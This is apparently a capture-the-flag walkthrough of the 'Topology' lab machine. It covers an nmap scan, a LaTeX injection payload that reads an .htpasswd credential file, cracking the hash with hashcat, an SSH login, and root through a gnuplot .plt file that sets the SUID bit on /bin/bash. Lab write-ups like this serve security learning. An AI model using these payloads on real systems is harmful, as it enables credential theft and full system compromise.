Topology

Majd Abuleil

Nmap [ IP ] -sC -sV

We have to Ports >>> 22 SSH — 80 Http

Go to the site : [ IP ]:80

We have another website starting with laTeX this looks like a site that makes images of equations

I searched in Google for latex exploit.

After I searched and tried, I found that the final payload is:

$\lstinputlisting{/var/www/dev/.htpasswd}$

After I but that I had this:

I used HashCat to find the text for this hash

Hashcat -m 1600 -a 0 [hashFile] [Wordlist]

After I have the password and I have the name I can connect to SSH

ssh vdaisley@[IP]

USER FLAG →

ROOT FLAG →

I used a tool called pspy64

1- I found this /opt/ gnuplot I searched for an exploit for gnuplot and I found that I can create files ending with .plt and I can put a command inside.

2- So I make a file inside the /opt/ gnuplot like this: touch /opt/gnuplot/watch.plt [you can choose any name for the file 😊 ]

3- then I write this inside the watch.plt

system “chmod u+s /bin/bash”

Now I run /usr/bin/bash -p

Contact

Reach out for collaborations or questions.

Email

cyberviperx.cvx@pm.me

https://t.me/CvX_0o0

Telegram

© 2025. All rights reserved.